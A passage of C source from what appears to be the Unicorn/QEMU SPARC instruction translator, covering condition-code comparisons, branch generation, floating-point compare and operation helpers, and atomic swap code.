tcg_ctx->cpu_npc, 4); } static void free_compare(TCGContext *tcg_ctx, DisasCompare *cmp) { if (!cmp->g1) { tcg_temp_free(tcg_ctx, cmp->c1); } if (!cmp->g2) { tcg_temp_free(tcg_ctx, cmp->c2); } } static void gen_compare(DisasCompare *cmp, bool xcc, unsigned int cond, DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; static int subcc_cond[16] = { TCG_COND_NEVER, TCG_COND_EQ, TCG_COND_LE, TCG_COND_LT, TCG_COND_LEU, TCG_COND_LTU, -1, /* neg */ -1, /* overflow */ TCG_COND_ALWAYS, TCG_COND_NE, TCG_COND_GT, TCG_COND_GE, TCG_COND_GTU, TCG_COND_GEU, -1, /* pos */ -1, /* no overflow */ }; static int logic_cond[16] = { TCG_COND_NEVER, TCG_COND_EQ, /* eq: Z */ TCG_COND_LE, /* le: Z | (N ^ V) -> Z | N */ TCG_COND_LT, /* lt: N ^ V -> N */ TCG_COND_EQ, /* leu: C | Z -> Z */ TCG_COND_NEVER, /* ltu: C -> 0 */ TCG_COND_LT, /* neg: N */ TCG_COND_NEVER, /* vs: V -> 0 */ TCG_COND_ALWAYS, TCG_COND_NE, /* ne: !Z */ TCG_COND_GT, /* gt: !(Z | (N ^ V)) -> !(Z | N) */ TCG_COND_GE, /* ge: !(N ^ V) -> !N */ TCG_COND_NE, /* gtu: !(C | Z) -> !Z */ TCG_COND_ALWAYS, /* geu: !C -> 1 */ TCG_COND_GE, /* pos: !N */ TCG_COND_ALWAYS, /* vc: !V -> 1 */ }; TCGv_i32 r_src; TCGv r_dst; #ifdef TARGET_SPARC64 if (xcc) { r_src = tcg_ctx->cpu_xcc; } else { r_src = tcg_ctx->cpu_psr; } #else r_src = tcg_ctx->cpu_psr; #endif switch (dc->cc_op) { case CC_OP_LOGIC: cmp->cond = logic_cond[cond]; do_compare_dst_0: cmp->is_bool = false; cmp->g2 = false; cmp->c2 = tcg_const_tl(tcg_ctx, 0); #ifdef TARGET_SPARC64 if (!xcc) { cmp->g1 = false; cmp->c1 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, tcg_ctx->cpu_cc_dst); break; } #endif cmp->g1 = true; cmp->c1 = tcg_ctx->cpu_cc_dst; break; case CC_OP_SUB: switch (cond) { case 6: /* neg */ case 14: /* pos */ cmp->cond = (cond == 6 ? TCG_COND_LT : TCG_COND_GE); goto do_compare_dst_0; case 7: /* overflow */ case 15: /* !overflow */ goto do_dynamic; default: cmp->cond = subcc_cond[cond]; cmp->is_bool = false; #ifdef TARGET_SPARC64 if (!xcc) { /* Note that sign-extension works for unsigned compares as long as both operands are sign-extended. */ cmp->g1 = cmp->g2 = false; cmp->c1 = tcg_temp_new(tcg_ctx); cmp->c2 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, tcg_ctx->cpu_cc_src); tcg_gen_ext32s_tl(tcg_ctx, cmp->c2, tcg_ctx->cpu_cc_src2); break; } #endif cmp->g1 = cmp->g2 = true; cmp->c1 = tcg_ctx->cpu_cc_src; cmp->c2 = tcg_ctx->cpu_cc_src2; break; } break; default: do_dynamic: gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); dc->cc_op = CC_OP_FLAGS; /* FALLTHRU */ case CC_OP_FLAGS: /* We're going to generate a boolean result. 
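gen_helper_compute_psr has just folded the lazily computed flags into cpu_psr (or cpu_xcc), so the gen_op_eval_* routine below leaves 0 or 1 in a fresh temporary, which the caller tests with TCG_COND_NE against zero.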
*/ cmp->cond = TCG_COND_NE; cmp->is_bool = true; cmp->g1 = cmp->g2 = false; cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); cmp->c2 = tcg_const_tl(tcg_ctx, 0); switch (cond) { case 0x0: gen_op_eval_bn(tcg_ctx, r_dst); break; case 0x1: gen_op_eval_be(tcg_ctx, r_dst, r_src); break; case 0x2: gen_op_eval_ble(tcg_ctx, r_dst, r_src); break; case 0x3: gen_op_eval_bl(tcg_ctx, r_dst, r_src); break; case 0x4: gen_op_eval_bleu(tcg_ctx, r_dst, r_src); break; case 0x5: gen_op_eval_bcs(tcg_ctx, r_dst, r_src); break; case 0x6: gen_op_eval_bneg(tcg_ctx, r_dst, r_src); break; case 0x7: gen_op_eval_bvs(tcg_ctx, r_dst, r_src); break; case 0x8: gen_op_eval_ba(tcg_ctx, r_dst); break; case 0x9: gen_op_eval_bne(tcg_ctx, r_dst, r_src); break; case 0xa: gen_op_eval_bg(tcg_ctx, r_dst, r_src); break; case 0xb: gen_op_eval_bge(tcg_ctx, r_dst, r_src); break; case 0xc: gen_op_eval_bgu(tcg_ctx, r_dst, r_src); break; case 0xd: gen_op_eval_bcc(tcg_ctx, r_dst, r_src); break; case 0xe: gen_op_eval_bpos(tcg_ctx, r_dst, r_src); break; case 0xf: gen_op_eval_bvc(tcg_ctx, r_dst, r_src); break; } break; } } static void gen_fcompare(TCGContext *tcg_ctx, DisasCompare *cmp, unsigned int cc, unsigned int cond) { unsigned int offset; TCGv r_dst; /* For now we still generate a straight boolean result. */ cmp->cond = TCG_COND_NE; cmp->is_bool = true; cmp->g1 = cmp->g2 = false; cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); cmp->c2 = tcg_const_tl(tcg_ctx, 0); switch (cc) { default: case 0x0: offset = 0; break; case 0x1: offset = 32 - 10; break; case 0x2: offset = 34 - 10; break; case 0x3: offset = 36 - 10; break; } switch (cond) { case 0x0: gen_op_eval_bn(tcg_ctx, r_dst); break; case 0x1: gen_op_eval_fbne(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x2: gen_op_eval_fblg(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x3: gen_op_eval_fbul(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x4: gen_op_eval_fbl(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x5: gen_op_eval_fbug(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x6: gen_op_eval_fbg(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x7: gen_op_eval_fbu(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0x8: gen_op_eval_ba(tcg_ctx, r_dst); break; case 0x9: gen_op_eval_fbe(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xa: gen_op_eval_fbue(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xb: gen_op_eval_fbge(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xc: gen_op_eval_fbuge(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xd: gen_op_eval_fble(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xe: gen_op_eval_fbule(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; case 0xf: gen_op_eval_fbo(tcg_ctx, r_dst, tcg_ctx->cpu_fsr, offset); break; } } static void gen_cond(TCGv r_dst, unsigned int cc, unsigned int cond, DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasCompare cmp; gen_compare(&cmp, cc, cond, dc); /* The interface is to return a boolean in r_dst. */ if (cmp.is_bool) { tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); } else { tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); } free_compare(tcg_ctx, &cmp); } static void gen_fcond(TCGContext *tcg_ctx, TCGv r_dst, unsigned int cc, unsigned int cond) { DisasCompare cmp; gen_fcompare(tcg_ctx, &cmp, cc, cond); /* The interface is to return a boolean in r_dst. 
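If the compare is already boolean, cmp.c1 holds the 0/1 value and a plain move suffices; otherwise setcond materializes it from cmp.cond, cmp.c1 and cmp.c2.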
*/ if (cmp.is_bool) { tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); } else { tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); } free_compare(tcg_ctx, &cmp); } #ifdef TARGET_SPARC64 // Inverted logic static const int gen_tcg_cond_reg[8] = { -1, TCG_COND_NE, TCG_COND_GT, TCG_COND_GE, -1, TCG_COND_EQ, TCG_COND_LE, TCG_COND_LT, }; static void gen_compare_reg(TCGContext *tcg_ctx, DisasCompare *cmp, int cond, TCGv r_src) { cmp->cond = tcg_invert_cond(gen_tcg_cond_reg[cond]); cmp->is_bool = false; cmp->g1 = true; cmp->g2 = false; cmp->c1 = r_src; cmp->c2 = tcg_const_tl(tcg_ctx, 0); } static inline void gen_cond_reg(TCGContext *tcg_ctx, TCGv r_dst, int cond, TCGv r_src) { DisasCompare cmp; gen_compare_reg(tcg_ctx, &cmp, cond, r_src); /* The interface is to return a boolean in r_dst. */ tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); free_compare(tcg_ctx, &cmp); } #endif static void do_branch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); target_ulong target = dc->pc + offset; #ifdef TARGET_SPARC64 if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } #endif if (cond == 0x0) { /* unconditional not taken */ if (a) { dc->pc = dc->npc + 4; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = dc->pc + 4; } } else if (cond == 0x8) { /* unconditional taken */ if (a) { dc->pc = target; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = target; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); } } else { flush_cond(dc); gen_cond(tcg_ctx->cpu_cond, cc, cond, dc); if (a) { gen_branch_a(dc, target); } else { gen_branch_n(dc, target); } } } static void do_fbranch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); target_ulong target = dc->pc + offset; #ifdef TARGET_SPARC64 if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } #endif if (cond == 0x0) { /* unconditional not taken */ if (a) { dc->pc = dc->npc + 4; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = dc->pc + 4; } } else if (cond == 0x8) { /* unconditional taken */ if (a) { dc->pc = target; dc->npc = dc->pc + 4; } else { dc->pc = dc->npc; dc->npc = target; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_npc); } } else { flush_cond(dc); gen_fcond(tcg_ctx, tcg_ctx->cpu_cond, cc, cond); if (a) { gen_branch_a(dc, target); } else { gen_branch_n(dc, target); } } } #ifdef TARGET_SPARC64 static void do_branch_reg(DisasContext *dc, int32_t offset, uint32_t insn, TCGv r_reg) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int cond = GET_FIELD_SP(insn, 25, 27), a = (insn & (1 << 29)); target_ulong target = dc->pc + offset; if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } flush_cond(dc); gen_cond_reg(tcg_ctx, tcg_ctx->cpu_cond, cond, r_reg); if (a) { gen_branch_a(dc, target); } else { gen_branch_n(dc, target); } } static inline void gen_op_fcmps(TCGContext *tcg_ctx, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) { switch (fccno) { case 0: gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmps_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmps_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmps_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmpd(TCGContext *tcg_ctx, 
int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { switch (fccno) { case 0: gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmpd_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmpd_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmpd_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmpq(TCGContext *tcg_ctx, int fccno) { switch (fccno) { case 0: gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 1: gen_helper_fcmpq_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 2: gen_helper_fcmpq_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 3: gen_helper_fcmpq_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; } } static inline void gen_op_fcmpes(TCGContext *tcg_ctx, int fccno, TCGv_i32 r_rs1, TCGv_i32 r_rs2) { switch (fccno) { case 0: gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmpes_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmpes_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmpes_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmped(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { switch (fccno) { case 0: gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 1: gen_helper_fcmped_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 2: gen_helper_fcmped_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; case 3: gen_helper_fcmped_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); break; } } static inline void gen_op_fcmpeq(TCGContext *tcg_ctx, int fccno) { switch (fccno) { case 0: gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 1: gen_helper_fcmpeq_fcc1(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 2: gen_helper_fcmpeq_fcc2(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; case 3: gen_helper_fcmpeq_fcc3(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); break; } } #else static inline void gen_op_fcmps(TCGContext *tcg_ctx, int fccno, TCGv r_rs1, TCGv r_rs2) { gen_helper_fcmps(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmpd(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { gen_helper_fcmpd(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmpq(TCGContext *tcg_ctx, int fccno) { gen_helper_fcmpq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); } static inline void gen_op_fcmpes(TCGContext *tcg_ctx, int fccno, TCGv r_rs1, TCGv r_rs2) { gen_helper_fcmpes(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmped(TCGContext *tcg_ctx, int fccno, TCGv_i64 r_rs1, TCGv_i64 r_rs2) { gen_helper_fcmped(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env, r_rs1, r_rs2); } static inline void gen_op_fcmpeq(TCGContext *tcg_ctx, int fccno) { gen_helper_fcmpeq(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); } #endif static void gen_op_fpexception_im(DisasContext *dc, int fsr_flags) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_fsr, FSR_FTT_NMASK); tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_fsr, fsr_flags); gen_exception(dc, 
TT_FP_EXCP); } static int gen_trap_ifnofpu(DisasContext *dc) { if (!dc->fpu_enabled) { gen_exception(dc, TT_NFPU_INSN); return 1; } return 0; } static inline void gen_op_clear_ieee_excp_and_FTT(TCGContext *tcg_ctx) { tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_fsr, FSR_FTT_CEXC_NMASK); } static inline void gen_fop_FF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } static inline void gen_ne_fop_FF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, src); gen_store_fpr_F(dc, rd, dst); } static inline void gen_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src1, src2; src1 = gen_load_fpr_F(dc, rs1); src2 = gen_load_fpr_F(dc, rs2); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_FFF(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst, src1, src2; src1 = gen_load_fpr_F(dc, rs1); src2 = gen_load_fpr_F(dc, rs2); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, src1, src2); gen_store_fpr_F(dc, rd, dst); } #endif static inline void gen_fop_DD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src; src = gen_load_fpr_D(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_DD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src; src = gen_load_fpr_D(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, src); gen_store_fpr_D(dc, rd, dst); } #endif static inline void gen_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, src1, src2); gen_store_fpr_D(dc, rd, dst); } static inline void gen_gsr_fop_DDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx =
dc->uc->tcg_ctx; TCGv_i64 dst, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_gsr, src1, src2); gen_store_fpr_D(dc, rd, dst); } static inline void gen_ne_fop_DDDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst, src0, src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); src0 = gen_load_fpr_D(dc, rd); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, src0, src1, src2); gen_store_fpr_D(dc, rd, dst); } #endif static inline void gen_fop_QQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); gen(tcg_ctx, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } #ifdef TARGET_SPARC64 static inline void gen_ne_fop_QQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); gen(tcg_ctx, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } #endif static inline void gen_fop_QQQ(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_op_load_fpr_QT0(tcg_ctx, QFPREG(rs1)); gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs2)); gen(tcg_ctx, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } static inline void gen_fop_DFF(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i32, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; TCGv_i32 src1, src2; src1 = gen_load_fpr_F(dc, rs1); src2 = gen_load_fpr_F(dc, rs2); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } static inline void gen_fop_QDD(DisasContext *dc, int rd, int rs1, int rs2, void (*gen)(TCGContext *, TCGv_ptr, TCGv_i64, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 src1, src2; src1 = gen_load_fpr_D(dc, rs1); src2 = gen_load_fpr_D(dc, rs2); gen(tcg_ctx, tcg_ctx->cpu_env, src1, src2); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } #ifdef TARGET_SPARC64 static inline void gen_fop_DF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; TCGv_i32 src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } #endif static inline void gen_ne_fop_DF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; TCGv_i32 src; src = gen_load_fpr_F(dc, rs); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_store_fpr_D(dc, rd, dst); } static inline void gen_fop_FD(DisasContext *dc, int rd, int rs, void 
(*gen)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst; TCGv_i64 src; src = gen_load_fpr_D(dc, rs); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env, src); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } static inline void gen_fop_FQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i32, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 dst; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); dst = gen_dest_fpr_F(dc); gen(tcg_ctx, dst, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_F(dc, rd, dst); } static inline void gen_fop_DQ(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_i64, TCGv_ptr)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst; gen_op_load_fpr_QT1(tcg_ctx, QFPREG(rs)); dst = gen_dest_fpr_D(dc, rd); gen(tcg_ctx, dst, tcg_ctx->cpu_env); gen_helper_check_ieee_exceptions(tcg_ctx, tcg_ctx->cpu_fsr, tcg_ctx->cpu_env); gen_store_fpr_D(dc, rd, dst); } static inline void gen_ne_fop_QF(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 src; src = gen_load_fpr_F(dc, rs); gen(tcg_ctx, tcg_ctx->cpu_env, src); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } static inline void gen_ne_fop_QD(DisasContext *dc, int rd, int rs, void (*gen)(TCGContext *, TCGv_ptr, TCGv_i64)) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 src; src = gen_load_fpr_D(dc, rs); gen(tcg_ctx, tcg_ctx->cpu_env, src); gen_op_store_QT0_fpr(tcg_ctx, QFPREG(rd)); gen_update_fprs_dirty(dc, QFPREG(rd)); } static void gen_swap(DisasContext *dc, TCGv dst, TCGv src, TCGv addr, int mmu_idx, MemOp memop) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; gen_address_mask(dc, addr); tcg_gen_atomic_xchg_tl(tcg_ctx, dst, addr, src, mmu_idx, memop); } static void gen_ldstub(DisasContext *dc, TCGv dst, TCGv addr, int mmu_idx) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv m1 = tcg_const_tl(tcg_ctx, 0xff); gen_address_mask(dc, addr); tcg_gen_atomic_xchg_tl(tcg_ctx, dst, addr, m1, mmu_idx, MO_UB); tcg_temp_free(tcg_ctx, m1); } /* asi moves */ typedef enum { GET_ASI_HELPER, GET_ASI_EXCP, GET_ASI_DIRECT, GET_ASI_DTWINX, GET_ASI_BLOCK, GET_ASI_SHORT, GET_ASI_BCOPY, GET_ASI_BFILL, } ASIType; typedef struct { ASIType type; int asi; int mem_idx; MemOp memop; } DisasASI; static DisasASI get_asi(DisasContext *dc, int insn, MemOp memop) { int asi = GET_FIELD(insn, 19, 26); ASIType type = GET_ASI_HELPER; int mem_idx = dc->mem_idx; 